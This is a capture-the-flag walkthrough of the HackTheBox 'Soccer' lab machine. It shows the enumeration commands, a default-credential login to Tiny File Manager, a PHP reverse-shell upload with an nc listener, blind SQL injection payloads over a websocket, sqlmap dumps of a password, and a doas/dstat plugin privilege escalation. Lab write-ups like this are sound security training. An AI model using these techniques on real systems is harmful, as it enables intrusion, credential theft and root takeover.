# HackTheBox: Soccer
## Notes by [Invictus808](https://invictus808.com)

## Scan

- [nmap](enumeration/external/nmap.txt)
    - ```console
        $ nmap -T4 -p- -A $IP
        ```
- [nikto](enumeration/external/nikto.txt)
    - ```console
        $ nikto -h http://soccer.htb/
        ```
- gobuster
    - dir
        - [`soccer.htb`](enumeration/external/gobuster-dir.txt)
            - ```console
                $ gobuster dir -u http://soccer.htb/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt -x php,html -o gobuster-dir.txt
                ```
        - [`soc-player.soccer.htb`](enumeration/external/gobuster-dir-soc-player.txt)
            - ```console
                $ gobuster dir -u http://soc-player.soccer.htb/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt -x php,html -o gobuster-dir-soc-player.txt
                ```
    - [vhost](enumeration/external/gobuster-vhost.txt)
        - ```console
            $ gobuster vhost -u http://soccer.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -o gobuster-vhost.txt
            ```


## Tiny File Manager

- ![Tiny file manager login page](screenshots/tiny_file_manager_login.png "Tiny File Manager Login Page")
- [default credentials!!!](https://tinyfilemanager.github.io/docs/)
    - ```sh
        # username:password
        admin:admin@123
        user:12345
        ```


### User

- ![User home page](screenshots/tiny_file_manager_user.png "User Home Page")


### Admin

- ![Admin home page](screenshots/tiny_file_manager_admin.png "Admin Home Page")
- create [`reverse_shell.php`](exploits/reverse_shell.php) in `/tiny/uploads`
- set permissions
    - ```
                    owner   group   other
        read          x       x       x
        write         x       x       x
        execute       x       x       x
        ```
- set up listener on attack machine
    - ```console
        $ nc -lnvp $PORT -s $ATTACK_IP
        ```
- visit [`http://soccer.htb/tiny/uploads/reverse_shell.php`](http://soccer.htb/tiny/uploads/reverse_shell.php)


## Shell !!!

- ![www-data user shell](screenshots/www-data.png "www-data User Shell")


## File System Enumeration

- find all files with string `player`
    - ```console
        www-data@soccer:/$ grep -rnw '/' -e 'player' 2>/dev/null
        # OR
        www-data@soccer:/$ grep -Ril "player" / 2>/dev/null
        ```
        - ```console
            # more ...
            /etc/hosts:1:127.0.0.1  localhost       soccer  soccer.htb      soc-player.soccer.htb
            /etc/subuid:1:player:165536:65536
            /etc/passwd:34:player:x:1001:1001::/home/player:/bin/bash
            /etc/nginx/sites-available/soc-player.htb:5:    server_name soc-player.soccer.htb;
            # more ...
            ```
- [`/etc/nginx/sites-enabled`](enumeration/internal/nginx/)
    - [`default`](enumeration/internal/nginx/default)
    - [`soc-player.htb`](enumeration/internal/nginx/soc-player.htb)
        - lets enumerate `soc-player.soccer.htb` !


## Subdomain Enumeration (`soc-player.soccer.htb`)

- `/`
    - ![soc-player home page](screenshots/soc-player_home.png "soc-player Home Page")
- `/match`
    - ![soc-player match page](screenshots/soc-player_match.png "soc-player Match Page")
- `/signup`
    - ![soc-player signup page](screenshots/soc-player_signup.png "soc-player Signup Page")
    - ```sh
        email: test@test.com
        username: test
        password: test
        ```
        - [HTTP signup request](requests/soc-player_signup.req)
- `/login`
    - ![soc-player login page](screenshots/soc-player_login.png "soc-player Login Page")
- `/check`
    - ![soc-player check page](screenshots/soc-player_check.png "soc-player Check Page")
        - ```sh
            web socket: ws://soc-player.soccer.htb:9091
            ```


## Websocket

- send messages to websocket
    - ```console
        $ wsdump ws://soc-player.soccer.htb:9091
        > {"id": 12345 }
        < Ticket Exists
        > {"id": 12345 }
        < Ticket Doesn't Exist
        ```
        - valid and invalid ticket id responses from server
- test for sqli
    - [`ws.py`](code/ws.py)
        - ```console
            $ python3 ws.py ws://soc-player.soccer.htb:9091
            [*] > Enter "id" value (type "q" to quit): 1 or substring(version(),1,1)=8
            [*] < Ticket Exists
            [*] > Enter "id" value (type "q" to quit): 1 or substring(version(),1,1)=7
            [*] < Ticket Doesn't Exist
            ```
            - sqli vulnerability !!!
- convert [web socket to api](https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-automation.html) to use sqlmap
    - [`ws_sqlmap.py`](code/ws_sqlmap.py)
- sqlmap
    - find all databases
        - ```console
            $ sqlmap -u $API --dbs

            available databases [5]:
            [*] information_schema
            [*] mysql
            [*] performance_schema
            [*] soccer_db
            [*] sys
            ```
    - find all tables
        - ```console
            $ sqlmap -u $API -D soccer_db --tables

            Database: soccer_db
            [1 table]
            +----------+
            | accounts |
            +----------+
            ```
    - dump table
        - ```console
            $ sqlmap -u $API -D soccer_db -T table --dump

            Database: soccer_db
            Table: accounts
            [1 entry]
            +------+-------------------+----------------------+----------+
            | id   | email             | password             | username |
            +------+-------------------+----------------------+----------+
            | 1324 | player@player.htb | PlayerOftheMatch2022 | player   |
            +------+-------------------+----------------------+----------+
            ```


## User Account Shell !!!

- SSH as `player` user
    - ```console
        $ ssh player@soccer.htb
        player@soccer.htb's password: PlayerOftheMatch2022
        ```
        - ![player user shell](screenshots/player.png)
- retrieve [`user.txt`](flags/user.txt) flag
    - ```console
        player@soccer:~$ cat /home/player/user.txt
        ```


## Privilege Escalation

### doas

- [`/usr/local/etc/doas.conf`](enumeration/internal/doas.conf)
    - ```conf
        permit nopass player as root cmd /usr/bin/dstat
        ```


### dstat

- `/usr/local/share/dstat`
    - location of plugins
    - plugins in the form of `dstat_PLUGIN_NAME.py`
- run plugin as root
    - ```console
        player@soccer:~$ doas -u root /usr/bin/dstat --PLUGIN_NAME
        ```
        - [plugin exploit](exploits/dstat_shell.py)
- PWNED !!!
    - ![Root shell](screenshots/root.png "Root Shell")
- retrieve [`root.txt`](flags/root.txt) flag
    - ```console
        root@soccer:~# cat /root/root.txt
        ```


## Acknowledgment of Completion

- [HackTheBox - Soccer Completion](https://www.hackthebox.com/achievement/machine/1303009/519)
